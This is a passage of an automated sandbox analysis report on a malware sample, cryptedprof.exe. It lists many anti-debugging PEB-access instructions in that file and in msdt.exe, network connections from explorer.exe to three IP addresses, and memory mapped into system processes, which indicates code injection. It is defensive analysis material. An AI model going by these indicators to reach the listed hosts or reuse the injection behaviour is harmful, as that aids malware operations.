          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88D34 mov eax, dword ptr fs:[00000030h]3_2_00B88D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7E539 mov eax, dword ptr fs:[00000030h]3_2_00B7E539
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h]3_2_00AE4D3B
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h]3_2_00AC3D34
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABAD30 mov eax, dword ptr fs:[00000030h]3_2_00ABAD30
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]3_2_00ADC577
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]3_2_00ADC577
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF3D43 mov eax, dword ptr fs:[00000030h]3_2_00AF3D43
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B33540 mov eax, dword ptr fs:[00000030h]3_2_00B33540
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B63D40 mov eax, dword ptr fs:[00000030h]3_2_00B63D40
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AD7D50 mov eax, dword ptr fs:[00000030h]3_2_00AD7D50
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B346A7 mov eax, dword ptr fs:[00000030h]3_2_00B346A7
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B4FE87 mov eax, dword ptr fs:[00000030h]3_2_00B4FE87
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]3_2_00AE16E0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC76E2 mov eax, dword ptr fs:[00000030h]3_2_00AC76E2
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE36CC mov eax, dword ptr fs:[00000030h]3_2_00AE36CC
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]3_2_00AF8EC7
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B88ED6 mov eax, dword ptr fs:[00000030h]3_2_00B88ED6
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]3_2_00B6FEC0
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h]3_2_00B6FE3F
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h]3_2_00ABE620
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h]3_2_00AE8E00
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h]3_2_00B71608
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h]3_2_00AC766D
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\Desktop\cryptedprof.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04761074 mov eax, dword ptr fs:[00000030h]7_2_04761074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04752073 mov eax, dword ptr fs:[00000030h]7_2_04752073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B746D mov eax, dword ptr fs:[00000030h]7_2_046B746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472C450 mov eax, dword ptr fs:[00000030h]7_2_0472C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472C450 mov eax, dword ptr fs:[00000030h]7_2_0472C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CA44B mov eax, dword ptr fs:[00000030h]7_2_046CA44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B0050 mov eax, dword ptr fs:[00000030h]7_2_046B0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B0050 mov eax, dword ptr fs:[00000030h]7_2_046B0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]7_2_046AB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]7_2_046AB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]7_2_046AB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AB02A mov eax, dword ptr fs:[00000030h]7_2_046AB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CBC2C mov eax, dword ptr fs:[00000030h]7_2_046CBC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]7_2_046C002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]7_2_046C002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]7_2_046C002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]7_2_046C002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C002D mov eax, dword ptr fs:[00000030h]7_2_046C002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04764015 mov eax, dword ptr fs:[00000030h]7_2_04764015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04764015 mov eax, dword ptr fs:[00000030h]7_2_04764015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]7_2_04717016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]7_2_04717016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04717016 mov eax, dword ptr fs:[00000030h]7_2_04717016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04751C06 mov eax, dword ptr fs:[00000030h]7_2_04751C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0476740D mov eax, dword ptr fs:[00000030h]7_2_0476740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0476740D mov eax, dword ptr fs:[00000030h]7_2_0476740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0476740D mov eax, dword ptr fs:[00000030h]7_2_0476740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]7_2_04716C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]7_2_04716C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]7_2_04716C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716C0A mov eax, dword ptr fs:[00000030h]7_2_04716C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716CF0 mov eax, dword ptr fs:[00000030h]7_2_04716CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716CF0 mov eax, dword ptr fs:[00000030h]7_2_04716CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716CF0 mov eax, dword ptr fs:[00000030h]7_2_04716CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046958EC mov eax, dword ptr fs:[00000030h]7_2_046958EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047514FB mov eax, dword ptr fs:[00000030h]7_2_047514FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04768CD6 mov eax, dword ptr fs:[00000030h]7_2_04768CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]7_2_0472B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0472B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]7_2_0472B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]7_2_0472B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]7_2_0472B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0472B8D0 mov eax, dword ptr fs:[00000030h]7_2_0472B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D90AF mov eax, dword ptr fs:[00000030h]7_2_046D90AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]7_2_046C20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]7_2_046C20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]7_2_046C20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]7_2_046C20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]7_2_046C20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C20A0 mov eax, dword ptr fs:[00000030h]7_2_046C20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CF0BF mov ecx, dword ptr fs:[00000030h]7_2_046CF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CF0BF mov eax, dword ptr fs:[00000030h]7_2_046CF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CF0BF mov eax, dword ptr fs:[00000030h]7_2_046CF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04699080 mov eax, dword ptr fs:[00000030h]7_2_04699080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A849B mov eax, dword ptr fs:[00000030h]7_2_046A849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04713884 mov eax, dword ptr fs:[00000030h]7_2_04713884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04713884 mov eax, dword ptr fs:[00000030h]7_2_04713884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469C962 mov eax, dword ptr fs:[00000030h]7_2_0469C962
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B171 mov eax, dword ptr fs:[00000030h]7_2_0469B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B171 mov eax, dword ptr fs:[00000030h]7_2_0469B171
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BC577 mov eax, dword ptr fs:[00000030h]7_2_046BC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BC577 mov eax, dword ptr fs:[00000030h]7_2_046BC577
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046D3D43 mov eax, dword ptr fs:[00000030h]7_2_046D3D43
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BB944 mov eax, dword ptr fs:[00000030h]7_2_046BB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BB944 mov eax, dword ptr fs:[00000030h]7_2_046BB944
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04713540 mov eax, dword ptr fs:[00000030h]7_2_04713540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B7D50 mov eax, dword ptr fs:[00000030h]7_2_046B7D50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04768D34 mov eax, dword ptr fs:[00000030h]7_2_04768D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0471A537 mov eax, dword ptr fs:[00000030h]7_2_0471A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]7_2_046B4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]7_2_046B4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]7_2_046B4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov eax, dword ptr fs:[00000030h]7_2_046B4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046B4120 mov ecx, dword ptr fs:[00000030h]7_2_046B4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475E539 mov eax, dword ptr fs:[00000030h]7_2_0475E539
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C513A mov eax, dword ptr fs:[00000030h]7_2_046C513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C513A mov eax, dword ptr fs:[00000030h]7_2_046C513A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C4D3B mov eax, dword ptr fs:[00000030h]7_2_046C4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C4D3B mov eax, dword ptr fs:[00000030h]7_2_046C4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C4D3B mov eax, dword ptr fs:[00000030h]7_2_046C4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469AD30 mov eax, dword ptr fs:[00000030h]7_2_0469AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046A3D34 mov eax, dword ptr fs:[00000030h]7_2_046A3D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04699100 mov eax, dword ptr fs:[00000030h]7_2_04699100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04699100 mov eax, dword ptr fs:[00000030h]7_2_04699100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04699100 mov eax, dword ptr fs:[00000030h]7_2_04699100
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04748DF1 mov eax, dword ptr fs:[00000030h]7_2_04748DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B1E1 mov eax, dword ptr fs:[00000030h]7_2_0469B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B1E1 mov eax, dword ptr fs:[00000030h]7_2_0469B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0469B1E1 mov eax, dword ptr fs:[00000030h]7_2_0469B1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AD5E0 mov eax, dword ptr fs:[00000030h]7_2_046AD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046AD5E0 mov eax, dword ptr fs:[00000030h]7_2_046AD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475FDE2 mov eax, dword ptr fs:[00000030h]7_2_0475FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475FDE2 mov eax, dword ptr fs:[00000030h]7_2_0475FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475FDE2 mov eax, dword ptr fs:[00000030h]7_2_0475FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_0475FDE2 mov eax, dword ptr fs:[00000030h]7_2_0475FDE2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047241E8 mov eax, dword ptr fs:[00000030h]7_2_047241E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h]7_2_04716DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h]7_2_04716DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h]7_2_04716DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov ecx, dword ptr fs:[00000030h]7_2_04716DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h]7_2_04716DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04716DC9 mov eax, dword ptr fs:[00000030h]7_2_04716DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C61A0 mov eax, dword ptr fs:[00000030h]7_2_046C61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C61A0 mov eax, dword ptr fs:[00000030h]7_2_046C61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C35A1 mov eax, dword ptr fs:[00000030h]7_2_046C35A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047151BE mov eax, dword ptr fs:[00000030h]7_2_047151BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047151BE mov eax, dword ptr fs:[00000030h]7_2_047151BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047151BE mov eax, dword ptr fs:[00000030h]7_2_047151BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047151BE mov eax, dword ptr fs:[00000030h]7_2_047151BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047169A6 mov eax, dword ptr fs:[00000030h]7_2_047169A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C1DB5 mov eax, dword ptr fs:[00000030h]7_2_046C1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C1DB5 mov eax, dword ptr fs:[00000030h]7_2_046C1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C1DB5 mov eax, dword ptr fs:[00000030h]7_2_046C1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047605AC mov eax, dword ptr fs:[00000030h]7_2_047605AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_047605AC mov eax, dword ptr fs:[00000030h]7_2_047605AC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h]7_2_04692D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h]7_2_04692D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h]7_2_04692D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h]7_2_04692D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_04692D8A mov eax, dword ptr fs:[00000030h]7_2_04692D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046CA185 mov eax, dword ptr fs:[00000030h]7_2_046CA185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046BC182 mov eax, dword ptr fs:[00000030h]7_2_046BC182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C2581 mov eax, dword ptr fs:[00000030h]7_2_046C2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C2581 mov eax, dword ptr fs:[00000030h]7_2_046C2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 7_2_046C2581 mov eax, dword ptr fs:[00000030h]7_2_046C2581
          Source: C:\Users\user\Desktop\cryptedprof.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 111.221.46.49 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 168.206.81.138 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\cryptedprof.exeSection loaded: unknown target: C:\Users\user\Desktop\cryptedprof.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\cryptedprof.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and writeJump to behavior
